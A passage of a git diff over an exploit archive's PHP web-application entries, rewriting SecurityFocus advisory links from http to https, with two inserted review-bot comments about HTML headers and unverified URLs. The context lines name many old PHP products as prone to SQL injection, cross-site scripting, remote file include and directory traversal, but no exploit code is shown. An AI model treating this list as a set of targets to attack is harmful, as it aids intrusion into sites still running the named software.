@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14444/info +source: https://www.securityfocus.com/bid/14444/info OpenBook is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26063.txt b/exploits/php/webapps/26063.txt index 70e6968c6..aad5a63c5 100644 --- a/exploits/php/webapps/26063.txt +++ b/exploits/php/webapps/26063.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14454/info +source: https://www.securityfocus.com/bid/14454/info Naxtor Shopping Cart is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26064.txt b/exploits/php/webapps/26064.txt index 0613ec7c7..093cfe104 100644 --- a/exploits/php/webapps/26064.txt +++ b/exploits/php/webapps/26064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14456/info +source: https://www.securityfocus.com/bid/14456/info Naxtor Shopping Cart is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26067.txt b/exploits/php/webapps/26067.txt index ef3473973..d4c299520 100644 --- a/exploits/php/webapps/26067.txt +++ b/exploits/php/webapps/26067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14464/info +source: https://www.securityfocus.com/bid/14464/info Web content management is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26068.txt b/exploits/php/webapps/26068.txt index e87a78a96..0dbe569ad 100644 --- a/exploits/php/webapps/26068.txt +++ b/exploits/php/webapps/26068.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14464/info +source: https://www.securityfocus.com/bid/14464/info Web content management is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26072.txt b/exploits/php/webapps/26072.txt index f1eec51d3..40cb80bd4 100644 --- a/exploits/php/webapps/26072.txt +++ b/exploits/php/webapps/26072.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14474/info +source: https://www.securityfocus.com/bid/14474/info Portail PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26079.txt b/exploits/php/webapps/26079.txt index 5c57c1b1e..fe551fb44 100644 --- a/exploits/php/webapps/26079.txt +++ b/exploits/php/webapps/26079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14478/info +source: https://www.securityfocus.com/bid/14478/info Comdev eCommerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26080.txt b/exploits/php/webapps/26080.txt index 4fc423459..ff3339665 100644 --- a/exploits/php/webapps/26080.txt +++ b/exploits/php/webapps/26080.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14479/info +source: https://www.securityfocus.com/bid/14479/info Comdev eCommerce is prone to a directory traversal vulnerability. diff --git a/exploits/php/webapps/26081.txt b/exploits/php/webapps/26081.txt index 302d5c470..cd8c06a4f 100644 --- a/exploits/php/webapps/26081.txt +++ b/exploits/php/webapps/26081.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26082.txt b/exploits/php/webapps/26082.txt index 20b95aaf6..1db28b36b 100644 --- a/exploits/php/webapps/26082.txt +++ b/exploits/php/webapps/26082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26083.txt b/exploits/php/webapps/26083.txt index 65e4ba835..372bd9545 100644 --- a/exploits/php/webapps/26083.txt +++ b/exploits/php/webapps/26083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26084.txt b/exploits/php/webapps/26084.txt index 0574fecc9..23b1cddcd 100644 --- a/exploits/php/webapps/26084.txt +++ b/exploits/php/webapps/26084.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26085.txt b/exploits/php/webapps/26085.txt index 299a15e92..df5179674 100644 --- a/exploits/php/webapps/26085.txt +++ b/exploits/php/webapps/26085.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26086.txt b/exploits/php/webapps/26086.txt index dc5f29d34..070f6f5f8 100644 --- a/exploits/php/webapps/26086.txt +++ b/exploits/php/webapps/26086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26087.txt b/exploits/php/webapps/26087.txt index e8215ccfb..0d1db204f 100644 --- a/exploits/php/webapps/26087.txt +++ b/exploits/php/webapps/26087.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26088.txt b/exploits/php/webapps/26088.txt index 55d914c7d..ce2401fbe 100644 --- a/exploits/php/webapps/26088.txt +++ b/exploits/php/webapps/26088.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14481/info +source: https://www.securityfocus.com/bid/14481/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26089.txt b/exploits/php/webapps/26089.txt index e11a2aeb6..9b08a0054 100644 --- a/exploits/php/webapps/26089.txt +++ b/exploits/php/webapps/26089.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26090.txt b/exploits/php/webapps/26090.txt index 4d44c53c0..960eca0a9 100644 --- a/exploits/php/webapps/26090.txt +++ b/exploits/php/webapps/26090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26091.txt b/exploits/php/webapps/26091.txt index 2bb11d551..0f9118f6d 100644 --- a/exploits/php/webapps/26091.txt +++ b/exploits/php/webapps/26091.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26092.txt b/exploits/php/webapps/26092.txt index fe06cced1..836c08995 100644 --- a/exploits/php/webapps/26092.txt +++ b/exploits/php/webapps/26092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26093.txt b/exploits/php/webapps/26093.txt index 31329d370..7a5b3e5e2 100644 --- a/exploits/php/webapps/26093.txt +++ b/exploits/php/webapps/26093.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26094.txt b/exploits/php/webapps/26094.txt index f4d272b45..e4bf57974 100644 --- a/exploits/php/webapps/26094.txt +++ b/exploits/php/webapps/26094.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26095.txt b/exploits/php/webapps/26095.txt index 26435c79d..94185da00 100644 --- a/exploits/php/webapps/26095.txt +++ b/exploits/php/webapps/26095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26096.txt b/exploits/php/webapps/26096.txt index 47997e012..584f0876d 100644 --- a/exploits/php/webapps/26096.txt +++ b/exploits/php/webapps/26096.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26097.txt b/exploits/php/webapps/26097.txt index 2eccca884..d970d650e 100644 --- a/exploits/php/webapps/26097.txt +++ b/exploits/php/webapps/26097.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14482/info +source: https://www.securityfocus.com/bid/14482/info Jax PHP Scripts are affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26098.txt b/exploits/php/webapps/26098.txt index 97a3d8a5d..a239e39fa 100644 --- a/exploits/php/webapps/26098.txt +++ b/exploits/php/webapps/26098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14483/info +source: https://www.securityfocus.com/bid/14483/info FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26099.txt b/exploits/php/webapps/26099.txt index e351e5bcc..5bd14581c 100644 --- a/exploits/php/webapps/26099.txt +++ b/exploits/php/webapps/26099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14483/info +source: https://www.securityfocus.com/bid/14483/info FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26102.txt b/exploits/php/webapps/26102.txt index cee261825..3e6470038 100644 --- a/exploits/php/webapps/26102.txt +++ b/exploits/php/webapps/26102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14489/info +source: https://www.securityfocus.com/bid/14489/info PHP-Fusion is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/26103.txt b/exploits/php/webapps/26103.txt index 90d6147b0..3c61fec82 100644 --- a/exploits/php/webapps/26103.txt +++ b/exploits/php/webapps/26103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14490/info +source: https://www.securityfocus.com/bid/14490/info SysCP is affected by multiple script execution vulnerabilities. 
diff --git a/exploits/php/webapps/26104.html b/exploits/php/webapps/26104.html index ec389e291..5297b763e 100644 --- a/exploits/php/webapps/26104.html +++ b/exploits/php/webapps/26104.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14492/info +source: https://www.securityfocus.com/bid/14492/info Invision Power Board is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26105.html b/exploits/php/webapps/26105.html index 3ed4c5a25..c8d49b717 100644 --- a/exploits/php/webapps/26105.html +++ b/exploits/php/webapps/26105.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14495/info +source: https://www.securityfocus.com/bid/14495/info e107 Website System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26106.txt b/exploits/php/webapps/26106.txt index ee502a83f..a92e40899 100644 --- a/exploits/php/webapps/26106.txt +++ b/exploits/php/webapps/26106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14497/info +source: https://www.securityfocus.com/bid/14497/info Gravity Board X (GBX) is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/26111.txt b/exploits/php/webapps/26111.txt index ddd6e8ace..ad08b261f 100644 --- a/exploits/php/webapps/26111.txt +++ b/exploits/php/webapps/26111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14502/info +source: https://www.securityfocus.com/bid/14502/info Gravity Board X (GBX) is affected by an unauthorized access vulnerability. This issue is due to a failure in the application to perform proper access validation before granting access to privileged functions. 
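Review bot: In 26104.html and 26105.html the `source:` line touched here is line 1 of an .html file, so it and the description under it are bare text rather than an HTML comment and are parsed as page content when the file is opened. Since the line is being edited anyway, consider wrapping the header block in `<!-- ... -->`, or state in the commit message that header formatting is deliberately out of scope for this URL rewrite.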
diff --git a/exploits/php/webapps/26112.txt b/exploits/php/webapps/26112.txt index bb0096317..70a3fb5d6 100644 --- a/exploits/php/webapps/26112.txt +++ b/exploits/php/webapps/26112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14504/info +source: https://www.securityfocus.com/bid/14504/info Calendar Express is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26113.txt b/exploits/php/webapps/26113.txt index c7fd7289a..bc844d0e8 100644 --- a/exploits/php/webapps/26113.txt +++ b/exploits/php/webapps/26113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14504/info +source: https://www.securityfocus.com/bid/14504/info Calendar Express is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26114.txt b/exploits/php/webapps/26114.txt index b32564cae..a250a362a 100644 --- a/exploits/php/webapps/26114.txt +++ b/exploits/php/webapps/26114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14504/info +source: https://www.securityfocus.com/bid/14504/info Calendar Express is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26115.txt b/exploits/php/webapps/26115.txt index fab657e7b..7d878fbb4 100644 --- a/exploits/php/webapps/26115.txt +++ b/exploits/php/webapps/26115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14505/info +source: https://www.securityfocus.com/bid/14505/info Calendar Express is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
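Review bot: The rewritten `source:` lines in 26112.txt through 26115.txt differ from the old ones only in scheme, and nothing in these hunks shows that https://www.securityfocus.com/bid/14504/info and https://www.securityfocus.com/bid/14505/info were fetched and still return the referenced advisories. For a bulk rewrite of this kind, say in the commit message how the new URLs were checked, or that they were not, so that a reader does not take an unverified link for a confirmed reference.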
diff --git a/exploits/php/webapps/26116.txt b/exploits/php/webapps/26116.txt index 780dffda6..41026ed9f 100644 --- a/exploits/php/webapps/26116.txt +++ b/exploits/php/webapps/26116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14506/info +source: https://www.securityfocus.com/bid/14506/info Chipmunk CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26117.txt b/exploits/php/webapps/26117.txt index 7702fa76b..8ed8b8111 100644 --- a/exploits/php/webapps/26117.txt +++ b/exploits/php/webapps/26117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26118.txt b/exploits/php/webapps/26118.txt index b2f3802df..b9aba8742 100644 --- a/exploits/php/webapps/26118.txt +++ b/exploits/php/webapps/26118.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26119.txt b/exploits/php/webapps/26119.txt index fad584e30..7b3f90926 100644 --- a/exploits/php/webapps/26119.txt +++ b/exploits/php/webapps/26119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26120.txt b/exploits/php/webapps/26120.txt index 81029c377..23fe7023d 100644 
--- a/exploits/php/webapps/26120.txt +++ b/exploits/php/webapps/26120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26121.txt b/exploits/php/webapps/26121.txt index f8b525eb3..ee193d5d5 100644 --- a/exploits/php/webapps/26121.txt +++ b/exploits/php/webapps/26121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26122.txt b/exploits/php/webapps/26122.txt index 98ec755cf..adb5e671b 100644 --- a/exploits/php/webapps/26122.txt +++ b/exploits/php/webapps/26122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14507/info +source: https://www.securityfocus.com/bid/14507/info FunkBoard is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26127.txt b/exploits/php/webapps/26127.txt index b113c4702..49100795f 100644 --- a/exploits/php/webapps/26127.txt +++ b/exploits/php/webapps/26127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14516/info +source: https://www.securityfocus.com/bid/14516/info TClanPortal is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26140.txt b/exploits/php/webapps/26140.txt index 75dd0a85c..6a76358a2 100644 --- a/exploits/php/webapps/26140.txt +++ b/exploits/php/webapps/26140.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14534/info +source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26141.txt b/exploits/php/webapps/26141.txt index 1c4845d36..0cd11c8f4 100644 --- a/exploits/php/webapps/26141.txt +++ b/exploits/php/webapps/26141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14534/info +source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26142.txt b/exploits/php/webapps/26142.txt index e6a5307dc..17754980d 100644 --- a/exploits/php/webapps/26142.txt +++ b/exploits/php/webapps/26142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14534/info +source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26143.txt b/exploits/php/webapps/26143.txt index 8136ba174..2e98185c6 100644 --- a/exploits/php/webapps/26143.txt +++ b/exploits/php/webapps/26143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14534/info +source: https://www.securityfocus.com/bid/14534/info ezUpload is affected by multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26144.txt b/exploits/php/webapps/26144.txt index 95de9ead6..7160e08c6 100644 --- a/exploits/php/webapps/26144.txt +++ b/exploits/php/webapps/26144.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14535/info +source: https://www.securityfocus.com/bid/14535/info PHPTB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26146.txt b/exploits/php/webapps/26146.txt index 6b9eda6ab..2739fa1cc 100644 --- a/exploits/php/webapps/26146.txt +++ b/exploits/php/webapps/26146.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14538/info +source: https://www.securityfocus.com/bid/14538/info VegaDNS is vulnerable to cross-site scripting attacks. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26147.txt b/exploits/php/webapps/26147.txt index f33569870..f9d924e44 100644 --- a/exploits/php/webapps/26147.txt +++ b/exploits/php/webapps/26147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14553/info +source: https://www.securityfocus.com/bid/14553/info MyBulletinBoard is prone to multiple SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26148.txt b/exploits/php/webapps/26148.txt index 05f3872d5..e6f0e35e8 100644 --- a/exploits/php/webapps/26148.txt +++ b/exploits/php/webapps/26148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14553/info +source: https://www.securityfocus.com/bid/14553/info MyBulletinBoard is prone to multiple SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26149.txt b/exploits/php/webapps/26149.txt index 6f46d1ff9..570508f0b 100644 --- a/exploits/php/webapps/26149.txt +++ b/exploits/php/webapps/26149.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14553/info +source: https://www.securityfocus.com/bid/14553/info MyBulletinBoard is prone to multiple SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26150.txt b/exploits/php/webapps/26150.txt index 040e8dcf3..ec4e82bcd 100644 --- a/exploits/php/webapps/26150.txt +++ b/exploits/php/webapps/26150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14553/info +source: https://www.securityfocus.com/bid/14553/info MyBulletinBoard is prone to multiple SQL injection vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26153.txt b/exploits/php/webapps/26153.txt index 1555adb6a..f881b3697 100644 --- a/exploits/php/webapps/26153.txt +++ b/exploits/php/webapps/26153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14570/info +source: https://www.securityfocus.com/bid/14570/info My Image Gallery is prone to multiple cross-site scripting vulnerabilities due to improper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26155.txt b/exploits/php/webapps/26155.txt index 529cb68e2..04873f56d 100644 --- a/exploits/php/webapps/26155.txt +++ b/exploits/php/webapps/26155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14576/info +source: https://www.securityfocus.com/bid/14576/info ECW Shop is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26157.txt b/exploits/php/webapps/26157.txt index bbdb3117e..b1345eb39 100644 --- a/exploits/php/webapps/26157.txt +++ b/exploits/php/webapps/26157.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14578/info +source: https://www.securityfocus.com/bid/14578/info ECW Shop is prone to a cross-site scripting vulnerability. This issue is due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/php/webapps/26158.txt b/exploits/php/webapps/26158.txt index 783d27eae..6f3b781e3 100644 --- a/exploits/php/webapps/26158.txt +++ b/exploits/php/webapps/26158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14579/info +source: https://www.securityfocus.com/bid/14579/info ECW Shop is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/26159.txt b/exploits/php/webapps/26159.txt index fe003ad37..3ffc8ca5e 100644 --- a/exploits/php/webapps/26159.txt +++ b/exploits/php/webapps/26159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14589/info +source: https://www.securityfocus.com/bid/14589/info PHPFreeNews is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/26160.txt b/exploits/php/webapps/26160.txt index 3097be301..8e0ed0b98 100644 --- a/exploits/php/webapps/26160.txt +++ b/exploits/php/webapps/26160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14590/info +source: https://www.securityfocus.com/bid/14590/info PHPFreeNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26161.txt b/exploits/php/webapps/26161.txt index 91465960b..fc55e7b98 100644 --- a/exploits/php/webapps/26161.txt +++ b/exploits/php/webapps/26161.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14590/info +source: https://www.securityfocus.com/bid/14590/info PHPFreeNews is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26162.txt b/exploits/php/webapps/26162.txt index 2a56f194c..5e357b9f3 100644 --- a/exploits/php/webapps/26162.txt +++ b/exploits/php/webapps/26162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26163.txt b/exploits/php/webapps/26163.txt index ff675898d..49d815763 100644 --- a/exploits/php/webapps/26163.txt +++ b/exploits/php/webapps/26163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26164.txt b/exploits/php/webapps/26164.txt index 08e04f020..4b67c45ab 100644 --- a/exploits/php/webapps/26164.txt +++ b/exploits/php/webapps/26164.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26165.txt b/exploits/php/webapps/26165.txt index 9a5dfa84e..0fe1aa1ff 100644 --- a/exploits/php/webapps/26165.txt +++ b/exploits/php/webapps/26165.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26166.txt b/exploits/php/webapps/26166.txt index f8145b95d..6bedc0552 100644 --- a/exploits/php/webapps/26166.txt +++ b/exploits/php/webapps/26166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14592/info +source: https://www.securityfocus.com/bid/14592/info PHPTB is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26169.txt b/exploits/php/webapps/26169.txt index dcf93eb1f..fb496f373 100644 --- a/exploits/php/webapps/26169.txt +++ b/exploits/php/webapps/26169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14597/info +source: https://www.securityfocus.com/bid/14597/info W-Agora is prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26170.txt b/exploits/php/webapps/26170.txt index 75b8efb2f..298946dfe 100644 --- a/exploits/php/webapps/26170.txt +++ b/exploits/php/webapps/26170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14598/info +source: https://www.securityfocus.com/bid/14598/info ATutor is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/26171.php b/exploits/php/webapps/26171.php index ab9d46b1a..d1418eb67 100644 --- a/exploits/php/webapps/26171.php +++ b/exploits/php/webapps/26171.php 
